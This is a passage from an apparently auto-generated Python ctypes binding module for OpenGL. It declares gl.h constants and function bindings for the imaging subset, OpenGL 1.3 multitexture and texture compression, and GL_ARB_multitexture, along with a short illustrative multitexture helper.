GL_HISTOGRAM_SINK = 32813 # /usr/include/GL/gl.h:1617
GL_MINMAX = 32814 # /usr/include/GL/gl.h:1618
GL_MINMAX_FORMAT = 32815 # /usr/include/GL/gl.h:1619
GL_MINMAX_SINK = 32816 # /usr/include/GL/gl.h:1620
GL_TABLE_TOO_LARGE = 32817 # /usr/include/GL/gl.h:1621
GL_BLEND_EQUATION = 32777 # /usr/include/GL/gl.h:1622
GL_MIN = 32775 # /usr/include/GL/gl.h:1623
GL_MAX = 32776 # /usr/include/GL/gl.h:1624
GL_FUNC_ADD = 32774 # /usr/include/GL/gl.h:1625
GL_FUNC_SUBTRACT = 32778 # /usr/include/GL/gl.h:1626
GL_FUNC_REVERSE_SUBTRACT = 32779 # /usr/include/GL/gl.h:1627
GL_BLEND_COLOR = 32773 # /usr/include/GL/gl.h:1628
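# Entry points for the imaging subset declared above. Note that a libGL may
# export these symbols without the driver actually supporting the subset;
# checking for GL_ARB_imaging in the extension string at runtime is the
# reliable test.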
# /usr/include/GL/gl.h:1631
glColorTable = _link_function('glColorTable', None, [GLenum, GLenum, GLsizei, GLenum, GLenum, POINTER(GLvoid)], None)
# /usr/include/GL/gl.h:1635
glColorSubTable = _link_function('glColorSubTable', None, [GLenum, GLsizei, GLsizei, GLenum, GLenum, POINTER(GLvoid)], None)
# /usr/include/GL/gl.h:1640
glColorTableParameteriv = _link_function('glColorTableParameteriv', None, [GLenum, GLenum, POINTER(GLint)], None)
# /usr/include/GL/gl.h:1643
glColorTableParameterfv = _link_function('glColorTableParameterfv', None, [GLenum, GLenum, POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1646
glCopyColorSubTable = _link_function('glCopyColorSubTable', None, [GLenum, GLsizei, GLint, GLint, GLsizei], None)
# /usr/include/GL/gl.h:1649
glCopyColorTable = _link_function('glCopyColorTable', None, [GLenum, GLenum, GLint, GLint, GLsizei], None)
# /usr/include/GL/gl.h:1652
glGetColorTable = _link_function('glGetColorTable', None, [GLenum, GLenum, GLenum, POINTER(GLvoid)], None)
# /usr/include/GL/gl.h:1655
glGetColorTableParameterfv = _link_function('glGetColorTableParameterfv', None, [GLenum, GLenum, POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1658
glGetColorTableParameteriv = _link_function('glGetColorTableParameteriv', None, [GLenum, GLenum, POINTER(GLint)], None)
# /usr/include/GL/gl.h:1661
glBlendEquation = _link_function('glBlendEquation', None, [GLenum], None)
# /usr/include/GL/gl.h:1663
glBlendColor = _link_function('glBlendColor', None, [GLclampf, GLclampf, GLclampf, GLclampf], None)
# /usr/include/GL/gl.h:1666
glHistogram = _link_function('glHistogram', None, [GLenum, GLsizei, GLenum, GLboolean], None)
# /usr/include/GL/gl.h:1669
glResetHistogram = _link_function('glResetHistogram', None, [GLenum], None)
# /usr/include/GL/gl.h:1671
glGetHistogram = _link_function('glGetHistogram', None, [GLenum, GLboolean, GLenum, GLenum, POINTER(GLvoid)], None)
# /usr/include/GL/gl.h:1675
glGetHistogramParameterfv = _link_function('glGetHistogramParameterfv', None, [GLenum, GLenum, POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1678
glGetHistogramParameteriv = _link_function('glGetHistogramParameteriv', None, [GLenum, GLenum, POINTER(GLint)], None)
# /usr/include/GL/gl.h:1681
glMinmax = _link_function('glMinmax', None, [GLenum, GLenum, GLboolean], None)
# /usr/include/GL/gl.h:1684
glResetMinmax = _link_function('glResetMinmax', None, [GLenum], None)
# /usr/include/GL/gl.h:1686
glGetMinmax = _link_function('glGetMinmax', None, [GLenum, GLboolean, GLenum, GLenum, POINTER(GLvoid)], None)
# /usr/include/GL/gl.h:1690
glGetMinmaxParameterfv = _link_function('glGetMinmaxParameterfv', None, [GLenum, GLenum, POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1693
glGetMinmaxParameteriv = _link_function('glGetMinmaxParameteriv', None, [GLenum, GLenum, POINTER(GLint)], None)
# /usr/include/GL/gl.h:1696
glConvolutionFilter1D = _link_function('glConvolutionFilter1D', None, [GLenum, GLenum, GLsizei, GLenum, GLenum, POINTER(GLvoid)], None)
# /usr/include/GL/gl.h:1700
glConvolutionFilter2D = _link_function('glConvolutionFilter2D', None, [GLenum, GLenum, GLsizei, GLsizei, GLenum, GLenum, POINTER(GLvoid)], None)
# /usr/include/GL/gl.h:1704
glConvolutionParameterf = _link_function('glConvolutionParameterf', None, [GLenum, GLenum, GLfloat], None)
# /usr/include/GL/gl.h:1707
glConvolutionParameterfv = _link_function('glConvolutionParameterfv', None, [GLenum, GLenum, POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1710
glConvolutionParameteri = _link_function('glConvolutionParameteri', None, [GLenum, GLenum, GLint], None)
# /usr/include/GL/gl.h:1713
glConvolutionParameteriv = _link_function('glConvolutionParameteriv', None, [GLenum, GLenum, POINTER(GLint)], None)
# /usr/include/GL/gl.h:1716
glCopyConvolutionFilter1D = _link_function('glCopyConvolutionFilter1D', None, [GLenum, GLenum, GLint, GLint, GLsizei], None)
# /usr/include/GL/gl.h:1719
glCopyConvolutionFilter2D = _link_function('glCopyConvolutionFilter2D', None, [GLenum, GLenum, GLint, GLint, GLsizei, GLsizei], None)
# /usr/include/GL/gl.h:1723
glGetConvolutionFilter = _link_function('glGetConvolutionFilter', None, [GLenum, GLenum, GLenum, POINTER(GLvoid)], None)
# /usr/include/GL/gl.h:1726
glGetConvolutionParameterfv = _link_function('glGetConvolutionParameterfv', None, [GLenum, GLenum, POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1729
glGetConvolutionParameteriv = _link_function('glGetConvolutionParameteriv', None, [GLenum, GLenum, POINTER(GLint)], None)
# /usr/include/GL/gl.h:1732
glSeparableFilter2D = _link_function('glSeparableFilter2D', None, [GLenum, GLenum, GLsizei, GLsizei, GLenum, GLenum, POINTER(GLvoid), POINTER(GLvoid)], None)
# /usr/include/GL/gl.h:1736
glGetSeparableFilter = _link_function('glGetSeparableFilter', None, [GLenum, GLenum, GLenum, POINTER(GLvoid), POINTER(GLvoid), POINTER(GLvoid)], None)
PFNGLBLENDCOLORPROC = CFUNCTYPE(None, GLclampf, GLclampf, GLclampf, GLclampf) # /usr/include/GL/gl.h:1739
PFNGLBLENDEQUATIONPROC = CFUNCTYPE(None, GLenum) # /usr/include/GL/gl.h:1740
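# OpenGL 1.3 core additions: multitexture units, cube maps, compressed
# texture formats, multisampling, transpose-matrix loads, and the
# GL_COMBINE texture-environment mode.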
GL_TEXTURE0 = 33984 # /usr/include/GL/gl.h:1749
GL_TEXTURE1 = 33985 # /usr/include/GL/gl.h:1750
GL_TEXTURE2 = 33986 # /usr/include/GL/gl.h:1751
GL_TEXTURE3 = 33987 # /usr/include/GL/gl.h:1752
GL_TEXTURE4 = 33988 # /usr/include/GL/gl.h:1753
GL_TEXTURE5 = 33989 # /usr/include/GL/gl.h:1754
GL_TEXTURE6 = 33990 # /usr/include/GL/gl.h:1755
GL_TEXTURE7 = 33991 # /usr/include/GL/gl.h:1756
GL_TEXTURE8 = 33992 # /usr/include/GL/gl.h:1757
GL_TEXTURE9 = 33993 # /usr/include/GL/gl.h:1758
GL_TEXTURE10 = 33994 # /usr/include/GL/gl.h:1759
GL_TEXTURE11 = 33995 # /usr/include/GL/gl.h:1760
GL_TEXTURE12 = 33996 # /usr/include/GL/gl.h:1761
GL_TEXTURE13 = 33997 # /usr/include/GL/gl.h:1762
GL_TEXTURE14 = 33998 # /usr/include/GL/gl.h:1763
GL_TEXTURE15 = 33999 # /usr/include/GL/gl.h:1764
GL_TEXTURE16 = 34000 # /usr/include/GL/gl.h:1765
GL_TEXTURE17 = 34001 # /usr/include/GL/gl.h:1766
GL_TEXTURE18 = 34002 # /usr/include/GL/gl.h:1767
GL_TEXTURE19 = 34003 # /usr/include/GL/gl.h:1768
GL_TEXTURE20 = 34004 # /usr/include/GL/gl.h:1769
GL_TEXTURE21 = 34005 # /usr/include/GL/gl.h:1770
GL_TEXTURE22 = 34006 # /usr/include/GL/gl.h:1771
GL_TEXTURE23 = 34007 # /usr/include/GL/gl.h:1772
GL_TEXTURE24 = 34008 # /usr/include/GL/gl.h:1773
GL_TEXTURE25 = 34009 # /usr/include/GL/gl.h:1774
GL_TEXTURE26 = 34010 # /usr/include/GL/gl.h:1775
GL_TEXTURE27 = 34011 # /usr/include/GL/gl.h:1776
GL_TEXTURE28 = 34012 # /usr/include/GL/gl.h:1777
GL_TEXTURE29 = 34013 # /usr/include/GL/gl.h:1778
GL_TEXTURE30 = 34014 # /usr/include/GL/gl.h:1779
GL_TEXTURE31 = 34015 # /usr/include/GL/gl.h:1780
GL_ACTIVE_TEXTURE = 34016 # /usr/include/GL/gl.h:1781
GL_CLIENT_ACTIVE_TEXTURE = 34017 # /usr/include/GL/gl.h:1782
GL_MAX_TEXTURE_UNITS = 34018 # /usr/include/GL/gl.h:1783
GL_NORMAL_MAP = 34065 # /usr/include/GL/gl.h:1785
GL_REFLECTION_MAP = 34066 # /usr/include/GL/gl.h:1786
GL_TEXTURE_CUBE_MAP = 34067 # /usr/include/GL/gl.h:1787
GL_TEXTURE_BINDING_CUBE_MAP = 34068 # /usr/include/GL/gl.h:1788
GL_TEXTURE_CUBE_MAP_POSITIVE_X = 34069 # /usr/include/GL/gl.h:1789
GL_TEXTURE_CUBE_MAP_NEGATIVE_X = 34070 # /usr/include/GL/gl.h:1790
GL_TEXTURE_CUBE_MAP_POSITIVE_Y = 34071 # /usr/include/GL/gl.h:1791
GL_TEXTURE_CUBE_MAP_NEGATIVE_Y = 34072 # /usr/include/GL/gl.h:1792
GL_TEXTURE_CUBE_MAP_POSITIVE_Z = 34073 # /usr/include/GL/gl.h:1793
GL_TEXTURE_CUBE_MAP_NEGATIVE_Z = 34074 # /usr/include/GL/gl.h:1794
GL_PROXY_TEXTURE_CUBE_MAP = 34075 # /usr/include/GL/gl.h:1795
GL_MAX_CUBE_MAP_TEXTURE_SIZE = 34076 # /usr/include/GL/gl.h:1796
GL_COMPRESSED_ALPHA = 34025 # /usr/include/GL/gl.h:1798
GL_COMPRESSED_LUMINANCE = 34026 # /usr/include/GL/gl.h:1799
GL_COMPRESSED_LUMINANCE_ALPHA = 34027 # /usr/include/GL/gl.h:1800
GL_COMPRESSED_INTENSITY = 34028 # /usr/include/GL/gl.h:1801
GL_COMPRESSED_RGB = 34029 # /usr/include/GL/gl.h:1802
GL_COMPRESSED_RGBA = 34030 # /usr/include/GL/gl.h:1803
GL_TEXTURE_COMPRESSION_HINT = 34031 # /usr/include/GL/gl.h:1804
GL_TEXTURE_COMPRESSED_IMAGE_SIZE = 34464 # /usr/include/GL/gl.h:1805
GL_TEXTURE_COMPRESSED = 34465 # /usr/include/GL/gl.h:1806
GL_NUM_COMPRESSED_TEXTURE_FORMATS = 34466 # /usr/include/GL/gl.h:1807
GL_COMPRESSED_TEXTURE_FORMATS = 34467 # /usr/include/GL/gl.h:1808
GL_MULTISAMPLE = 32925 # /usr/include/GL/gl.h:1810
GL_SAMPLE_ALPHA_TO_COVERAGE = 32926 # /usr/include/GL/gl.h:1811
GL_SAMPLE_ALPHA_TO_ONE = 32927 # /usr/include/GL/gl.h:1812
GL_SAMPLE_COVERAGE = 32928 # /usr/include/GL/gl.h:1813
GL_SAMPLE_BUFFERS = 32936 # /usr/include/GL/gl.h:1814
GL_SAMPLES = 32937 # /usr/include/GL/gl.h:1815
GL_SAMPLE_COVERAGE_VALUE = 32938 # /usr/include/GL/gl.h:1816
GL_SAMPLE_COVERAGE_INVERT = 32939 # /usr/include/GL/gl.h:1817
GL_MULTISAMPLE_BIT = 536870912 # /usr/include/GL/gl.h:1818
GL_TRANSPOSE_MODELVIEW_MATRIX = 34019 # /usr/include/GL/gl.h:1820
GL_TRANSPOSE_PROJECTION_MATRIX = 34020 # /usr/include/GL/gl.h:1821
GL_TRANSPOSE_TEXTURE_MATRIX = 34021 # /usr/include/GL/gl.h:1822
GL_TRANSPOSE_COLOR_MATRIX = 34022 # /usr/include/GL/gl.h:1823
GL_COMBINE = 34160 # /usr/include/GL/gl.h:1825
GL_COMBINE_RGB = 34161 # /usr/include/GL/gl.h:1826
GL_COMBINE_ALPHA = 34162 # /usr/include/GL/gl.h:1827
GL_SOURCE0_RGB = 34176 # /usr/include/GL/gl.h:1828
GL_SOURCE1_RGB = 34177 # /usr/include/GL/gl.h:1829
GL_SOURCE2_RGB = 34178 # /usr/include/GL/gl.h:1830
GL_SOURCE0_ALPHA = 34184 # /usr/include/GL/gl.h:1831
GL_SOURCE1_ALPHA = 34185 # /usr/include/GL/gl.h:1832
GL_SOURCE2_ALPHA = 34186 # /usr/include/GL/gl.h:1833
GL_OPERAND0_RGB = 34192 # /usr/include/GL/gl.h:1834
GL_OPERAND1_RGB = 34193 # /usr/include/GL/gl.h:1835
GL_OPERAND2_RGB = 34194 # /usr/include/GL/gl.h:1836
GL_OPERAND0_ALPHA = 34200 # /usr/include/GL/gl.h:1837
GL_OPERAND1_ALPHA = 34201 # /usr/include/GL/gl.h:1838
GL_OPERAND2_ALPHA = 34202 # /usr/include/GL/gl.h:1839
GL_RGB_SCALE = 34163 # /usr/include/GL/gl.h:1840
GL_ADD_SIGNED = 34164 # /usr/include/GL/gl.h:1841
GL_INTERPOLATE = 34165 # /usr/include/GL/gl.h:1842
GL_SUBTRACT = 34023 # /usr/include/GL/gl.h:1843
GL_CONSTANT = 34166 # /usr/include/GL/gl.h:1844
GL_PRIMARY_COLOR = 34167 # /usr/include/GL/gl.h:1845
GL_PREVIOUS = 34168 # /usr/include/GL/gl.h:1846
GL_DOT3_RGB = 34478 # /usr/include/GL/gl.h:1848
GL_DOT3_RGBA = 34479 # /usr/include/GL/gl.h:1849
GL_CLAMP_TO_BORDER = 33069 # /usr/include/GL/gl.h:1851
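# OpenGL 1.3 entry points corresponding to the constants above; a small
# multitexture usage sketch follows the last of them.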
# /usr/include/GL/gl.h:1853
glActiveTexture = _link_function('glActiveTexture', None, [GLenum], None)
# /usr/include/GL/gl.h:1855
glClientActiveTexture = _link_function('glClientActiveTexture', None, [GLenum], None)
# /usr/include/GL/gl.h:1857
glCompressedTexImage1D = _link_function('glCompressedTexImage1D', None, [GLenum, GLint, GLenum, GLsizei, GLint, GLsizei, POINTER(GLvoid)], None)
# /usr/include/GL/gl.h:1859
glCompressedTexImage2D = _link_function('glCompressedTexImage2D', None, [GLenum, GLint, GLenum, GLsizei, GLsizei, GLint, GLsizei, POINTER(GLvoid)], None)
# /usr/include/GL/gl.h:1861
glCompressedTexImage3D = _link_function('glCompressedTexImage3D', None, [GLenum, GLint, GLenum, GLsizei, GLsizei, GLsizei, GLint, GLsizei, POINTER(GLvoid)], None)
# /usr/include/GL/gl.h:1863
glCompressedTexSubImage1D = _link_function('glCompressedTexSubImage1D', None, [GLenum, GLint, GLint, GLsizei, GLenum, GLsizei, POINTER(GLvoid)], None)
# /usr/include/GL/gl.h:1865
glCompressedTexSubImage2D = _link_function('glCompressedTexSubImage2D', None, [GLenum, GLint, GLint, GLint, GLsizei, GLsizei, GLenum, GLsizei, POINTER(GLvoid)], None)
# /usr/include/GL/gl.h:1867
glCompressedTexSubImage3D = _link_function('glCompressedTexSubImage3D', None, [GLenum, GLint, GLint, GLint, GLint, GLsizei, GLsizei, GLsizei, GLenum, GLsizei, POINTER(GLvoid)], None)
# /usr/include/GL/gl.h:1869
glGetCompressedTexImage = _link_function('glGetCompressedTexImage', None, [GLenum, GLint, POINTER(GLvoid)], None)
# /usr/include/GL/gl.h:1871
glMultiTexCoord1d = _link_function('glMultiTexCoord1d', None, [GLenum, GLdouble], None)
# /usr/include/GL/gl.h:1873
glMultiTexCoord1dv = _link_function('glMultiTexCoord1dv', None, [GLenum, POINTER(GLdouble)], None)
# /usr/include/GL/gl.h:1875
glMultiTexCoord1f = _link_function('glMultiTexCoord1f', None, [GLenum, GLfloat], None)
# /usr/include/GL/gl.h:1877
glMultiTexCoord1fv = _link_function('glMultiTexCoord1fv', None, [GLenum, POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1879
glMultiTexCoord1i = _link_function('glMultiTexCoord1i', None, [GLenum, GLint], None)
# /usr/include/GL/gl.h:1881
glMultiTexCoord1iv = _link_function('glMultiTexCoord1iv', None, [GLenum, POINTER(GLint)], None)
# /usr/include/GL/gl.h:1883
glMultiTexCoord1s = _link_function('glMultiTexCoord1s', None, [GLenum, GLshort], None)
# /usr/include/GL/gl.h:1885
glMultiTexCoord1sv = _link_function('glMultiTexCoord1sv', None, [GLenum, POINTER(GLshort)], None)
# /usr/include/GL/gl.h:1887
glMultiTexCoord2d = _link_function('glMultiTexCoord2d', None, [GLenum, GLdouble, GLdouble], None)
# /usr/include/GL/gl.h:1889
glMultiTexCoord2dv = _link_function('glMultiTexCoord2dv', None, [GLenum, POINTER(GLdouble)], None)
# /usr/include/GL/gl.h:1891
glMultiTexCoord2f = _link_function('glMultiTexCoord2f', None, [GLenum, GLfloat, GLfloat], None)
# /usr/include/GL/gl.h:1893
glMultiTexCoord2fv = _link_function('glMultiTexCoord2fv', None, [GLenum, POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1895
glMultiTexCoord2i = _link_function('glMultiTexCoord2i', None, [GLenum, GLint, GLint], None)
# /usr/include/GL/gl.h:1897
glMultiTexCoord2iv = _link_function('glMultiTexCoord2iv', None, [GLenum, POINTER(GLint)], None)
# /usr/include/GL/gl.h:1899
glMultiTexCoord2s = _link_function('glMultiTexCoord2s', None, [GLenum, GLshort, GLshort], None)
# /usr/include/GL/gl.h:1901
glMultiTexCoord2sv = _link_function('glMultiTexCoord2sv', None, [GLenum, POINTER(GLshort)], None)
# /usr/include/GL/gl.h:1903
glMultiTexCoord3d = _link_function('glMultiTexCoord3d', None, [GLenum, GLdouble, GLdouble, GLdouble], None)
# /usr/include/GL/gl.h:1905
glMultiTexCoord3dv = _link_function('glMultiTexCoord3dv', None, [GLenum, POINTER(GLdouble)], None)
# /usr/include/GL/gl.h:1907
glMultiTexCoord3f = _link_function('glMultiTexCoord3f', None, [GLenum, GLfloat, GLfloat, GLfloat], None)
# /usr/include/GL/gl.h:1909
glMultiTexCoord3fv = _link_function('glMultiTexCoord3fv', None, [GLenum, POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1911
glMultiTexCoord3i = _link_function('glMultiTexCoord3i', None, [GLenum, GLint, GLint, GLint], None)
# /usr/include/GL/gl.h:1913
glMultiTexCoord3iv = _link_function('glMultiTexCoord3iv', None, [GLenum, POINTER(GLint)], None)
# /usr/include/GL/gl.h:1915
glMultiTexCoord3s = _link_function('glMultiTexCoord3s', None, [GLenum, GLshort, GLshort, GLshort], None)
# /usr/include/GL/gl.h:1917
glMultiTexCoord3sv = _link_function('glMultiTexCoord3sv', None, [GLenum, POINTER(GLshort)], None)
# /usr/include/GL/gl.h:1919
glMultiTexCoord4d = _link_function('glMultiTexCoord4d', None, [GLenum, GLdouble, GLdouble, GLdouble, GLdouble], None)
# /usr/include/GL/gl.h:1921
glMultiTexCoord4dv = _link_function('glMultiTexCoord4dv', None, [GLenum, POINTER(GLdouble)], None)
# /usr/include/GL/gl.h:1923
glMultiTexCoord4f = _link_function('glMultiTexCoord4f', None, [GLenum, GLfloat, GLfloat, GLfloat, GLfloat], None)
# /usr/include/GL/gl.h:1925
glMultiTexCoord4fv = _link_function('glMultiTexCoord4fv', None, [GLenum, POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:1927
glMultiTexCoord4i = _link_function('glMultiTexCoord4i', None, [GLenum, GLint, GLint, GLint, GLint], None)
# /usr/include/GL/gl.h:1929
glMultiTexCoord4iv = _link_function('glMultiTexCoord4iv', None, [GLenum, POINTER(GLint)], None)
# /usr/include/GL/gl.h:1931
glMultiTexCoord4s = _link_function('glMultiTexCoord4s', None, [GLenum, GLshort, GLshort, GLshort, GLshort], None)
# /usr/include/GL/gl.h:1933
glMultiTexCoord4sv = _link_function('glMultiTexCoord4sv', None, [GLenum, POINTER(GLshort)], None)
# /usr/include/GL/gl.h:1936
glLoadTransposeMatrixd = _link_function('glLoadTransposeMatrixd', None, [GLdouble * 16], None)
# /usr/include/GL/gl.h:1938
glLoadTransposeMatrixf = _link_function('glLoadTransposeMatrixf', None, [GLfloat * 16], None)
# /usr/include/GL/gl.h:1940
glMultTransposeMatrixd = _link_function('glMultTransposeMatrixd', None, [GLdouble * 16], None)
# /usr/include/GL/gl.h:1942
glMultTransposeMatrixf = _link_function('glMultTransposeMatrixf', None, [GLfloat * 16], None)
# /usr/include/GL/gl.h:1944
glSampleCoverage = _link_function('glSampleCoverage', None, [GLclampf, GLboolean], None)
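
# A minimal multitexture sketch using the OpenGL 1.3 entry points bound
# above. Assumptions: a current OpenGL context, two texture objects already
# created by the caller, and the GL_TEXTURE_2D enumerant defined earlier in
# this module. Defined for illustration only; never called here.
def _example_bind_two_textures(tex0, tex1):
    """Bind one texture to each of the first two texture units (sketch)."""
    glActiveTexture(GL_TEXTURE0)        # unit 0: base map
    glBindTexture(GL_TEXTURE_2D, tex0)
    glActiveTexture(GL_TEXTURE1)        # unit 1: detail/light map
    glBindTexture(GL_TEXTURE_2D, tex1)
    # Per-vertex coordinates for each unit would then be supplied with
    # glMultiTexCoord2f(GL_TEXTURE0, s, t) and glMultiTexCoord2f(GL_TEXTURE1, s, t).
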
PFNGLACTIVETEXTUREPROC = CFUNCTYPE(None, GLenum) # /usr/include/GL/gl.h:1947
PFNGLSAMPLECOVERAGEPROC = CFUNCTYPE(None, GLclampf, GLboolean) # /usr/include/GL/gl.h:1948
PFNGLCOMPRESSEDTEXIMAGE3DPROC = CFUNCTYPE(None, GLenum, GLint, GLenum, GLsizei, GLsizei, GLsizei, GLint, GLsizei, POINTER(GLvoid)) # /usr/include/GL/gl.h:1949
PFNGLCOMPRESSEDTEXIMAGE2DPROC = CFUNCTYPE(None, GLenum, GLint, GLenum, GLsizei, GLsizei, GLint, GLsizei, POINTER(GLvoid)) # /usr/include/GL/gl.h:1950
PFNGLCOMPRESSEDTEXIMAGE1DPROC = CFUNCTYPE(None, GLenum, GLint, GLenum, GLsizei, GLint, GLsizei, POINTER(GLvoid)) # /usr/include/GL/gl.h:1951
PFNGLCOMPRESSEDTEXSUBIMAGE3DPROC = CFUNCTYPE(None, GLenum, GLint, GLint, GLint, GLint, GLsizei, GLsizei, GLsizei, GLenum, GLsizei, POINTER(GLvoid)) # /usr/include/GL/gl.h:1952
PFNGLCOMPRESSEDTEXSUBIMAGE2DPROC = CFUNCTYPE(None, GLenum, GLint, GLint, GLint, GLsizei, GLsizei, GLenum, GLsizei, POINTER(GLvoid)) # /usr/include/GL/gl.h:1953
PFNGLCOMPRESSEDTEXSUBIMAGE1DPROC = CFUNCTYPE(None, GLenum, GLint, GLint, GLsizei, GLenum, GLsizei, POINTER(GLvoid)) # /usr/include/GL/gl.h:1954
PFNGLGETCOMPRESSEDTEXIMAGEPROC = CFUNCTYPE(None, GLenum, GLint, POINTER(GLvoid)) # /usr/include/GL/gl.h:1955
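# GL_ARB_multitexture: the pre-1.3 extension form of multitexturing. The
# ARB-suffixed tokens below are numerically identical to their core 1.3
# counterparts, and the ARB-suffixed entry points exist for drivers that
# predate OpenGL 1.3.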
GL_ARB_multitexture = 1 # /usr/include/GL/gl.h:1963
GL_TEXTURE0_ARB = 33984 # /usr/include/GL/gl.h:1965
GL_TEXTURE1_ARB = 33985 # /usr/include/GL/gl.h:1966
GL_TEXTURE2_ARB = 33986 # /usr/include/GL/gl.h:1967
GL_TEXTURE3_ARB = 33987 # /usr/include/GL/gl.h:1968
GL_TEXTURE4_ARB = 33988 # /usr/include/GL/gl.h:1969
GL_TEXTURE5_ARB = 33989 # /usr/include/GL/gl.h:1970
GL_TEXTURE6_ARB = 33990 # /usr/include/GL/gl.h:1971
GL_TEXTURE7_ARB = 33991 # /usr/include/GL/gl.h:1972
GL_TEXTURE8_ARB = 33992 # /usr/include/GL/gl.h:1973
GL_TEXTURE9_ARB = 33993 # /usr/include/GL/gl.h:1974
GL_TEXTURE10_ARB = 33994 # /usr/include/GL/gl.h:1975
GL_TEXTURE11_ARB = 33995 # /usr/include/GL/gl.h:1976
GL_TEXTURE12_ARB = 33996 # /usr/include/GL/gl.h:1977
GL_TEXTURE13_ARB = 33997 # /usr/include/GL/gl.h:1978
GL_TEXTURE14_ARB = 33998 # /usr/include/GL/gl.h:1979
GL_TEXTURE15_ARB = 33999 # /usr/include/GL/gl.h:1980
GL_TEXTURE16_ARB = 34000 # /usr/include/GL/gl.h:1981
GL_TEXTURE17_ARB = 34001 # /usr/include/GL/gl.h:1982
GL_TEXTURE18_ARB = 34002 # /usr/include/GL/gl.h:1983
GL_TEXTURE19_ARB = 34003 # /usr/include/GL/gl.h:1984
GL_TEXTURE20_ARB = 34004 # /usr/include/GL/gl.h:1985
GL_TEXTURE21_ARB = 34005 # /usr/include/GL/gl.h:1986
GL_TEXTURE22_ARB = 34006 # /usr/include/GL/gl.h:1987
GL_TEXTURE23_ARB = 34007 # /usr/include/GL/gl.h:1988
GL_TEXTURE24_ARB = 34008 # /usr/include/GL/gl.h:1989
GL_TEXTURE25_ARB = 34009 # /usr/include/GL/gl.h:1990
GL_TEXTURE26_ARB = 34010 # /usr/include/GL/gl.h:1991
GL_TEXTURE27_ARB = 34011 # /usr/include/GL/gl.h:1992
GL_TEXTURE28_ARB = 34012 # /usr/include/GL/gl.h:1993
GL_TEXTURE29_ARB = 34013 # /usr/include/GL/gl.h:1994
GL_TEXTURE30_ARB = 34014 # /usr/include/GL/gl.h:1995
GL_TEXTURE31_ARB = 34015 # /usr/include/GL/gl.h:1996
GL_ACTIVE_TEXTURE_ARB = 34016 # /usr/include/GL/gl.h:1997
GL_CLIENT_ACTIVE_TEXTURE_ARB = 34017 # /usr/include/GL/gl.h:1998
GL_MAX_TEXTURE_UNITS_ARB = 34018 # /usr/include/GL/gl.h:1999
# /usr/include/GL/gl.h:2001
glActiveTextureARB = _link_function('glActiveTextureARB', None, [GLenum], None)
# /usr/include/GL/gl.h:2002
glClientActiveTextureARB = _link_function('glClientActiveTextureARB', None, [GLenum], None)
# /usr/include/GL/gl.h:2003
glMultiTexCoord1dARB = _link_function('glMultiTexCoord1dARB', None, [GLenum, GLdouble], None)
# /usr/include/GL/gl.h:2004
glMultiTexCoord1dvARB = _link_function('glMultiTexCoord1dvARB', None, [GLenum, POINTER(GLdouble)], None)
# /usr/include/GL/gl.h:2005
glMultiTexCoord1fARB = _link_function('glMultiTexCoord1fARB', None, [GLenum, GLfloat], None)
# /usr/include/GL/gl.h:2006
glMultiTexCoord1fvARB = _link_function('glMultiTexCoord1fvARB', None, [GLenum, POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:2007
glMultiTexCoord1iARB = _link_function('glMultiTexCoord1iARB', None, [GLenum, GLint], None)
# /usr/include/GL/gl.h:2008
glMultiTexCoord1ivARB = _link_function('glMultiTexCoord1ivARB', None, [GLenum, POINTER(GLint)], None)
# /usr/include/GL/gl.h:2009
glMultiTexCoord1sARB = _link_function('glMultiTexCoord1sARB', None, [GLenum, GLshort], None)
# /usr/include/GL/gl.h:2010
glMultiTexCoord1svARB = _link_function('glMultiTexCoord1svARB', None, [GLenum, POINTER(GLshort)], None)
# /usr/include/GL/gl.h:2011
glMultiTexCoord2dARB = _link_function('glMultiTexCoord2dARB', None, [GLenum, GLdouble, GLdouble], None)
# /usr/include/GL/gl.h:2012
glMultiTexCoord2dvARB = _link_function('glMultiTexCoord2dvARB', None, [GLenum, POINTER(GLdouble)], None)
# /usr/include/GL/gl.h:2013
glMultiTexCoord2fARB = _link_function('glMultiTexCoord2fARB', None, [GLenum, GLfloat, GLfloat], None)
# /usr/include/GL/gl.h:2014
glMultiTexCoord2fvARB = _link_function('glMultiTexCoord2fvARB', None, [GLenum, POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:2015
glMultiTexCoord2iARB = _link_function('glMultiTexCoord2iARB', None, [GLenum, GLint, GLint], None)
# /usr/include/GL/gl.h:2016
glMultiTexCoord2ivARB = _link_function('glMultiTexCoord2ivARB', None, [GLenum, POINTER(GLint)], None)
# /usr/include/GL/gl.h:2017
glMultiTexCoord2sARB = _link_function('glMultiTexCoord2sARB', None, [GLenum, GLshort, GLshort], None)
# /usr/include/GL/gl.h:2018
glMultiTexCoord2svARB = _link_function('glMultiTexCoord2svARB', None, [GLenum, POINTER(GLshort)], None)
# /usr/include/GL/gl.h:2019
glMultiTexCoord3dARB = _link_function('glMultiTexCoord3dARB', None, [GLenum, GLdouble, GLdouble, GLdouble], None)
# /usr/include/GL/gl.h:2020
glMultiTexCoord3dvARB = _link_function('glMultiTexCoord3dvARB', None, [GLenum, POINTER(GLdouble)], None)
# /usr/include/GL/gl.h:2021
glMultiTexCoord3fARB = _link_function('glMultiTexCoord3fARB', None, [GLenum, GLfloat, GLfloat, GLfloat], None)
# /usr/include/GL/gl.h:2022
glMultiTexCoord3fvARB = _link_function('glMultiTexCoord3fvARB', None, [GLenum, POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:2023
glMultiTexCoord3iARB = _link_function('glMultiTexCoord3iARB', None, [GLenum, GLint, GLint, GLint], None)
# /usr/include/GL/gl.h:2024
glMultiTexCoord3ivARB = _link_function('glMultiTexCoord3ivARB', None, [GLenum, POINTER(GLint)], None)
# /usr/include/GL/gl.h:2025
glMultiTexCoord3sARB = _link_function('glMultiTexCoord3sARB', None, [GLenum, GLshort, GLshort, GLshort], None)
# /usr/include/GL/gl.h:2026
glMultiTexCoord3svARB = _link_function('glMultiTexCoord3svARB', None, [GLenum, POINTER(GLshort)], None)
# /usr/include/GL/gl.h:2027
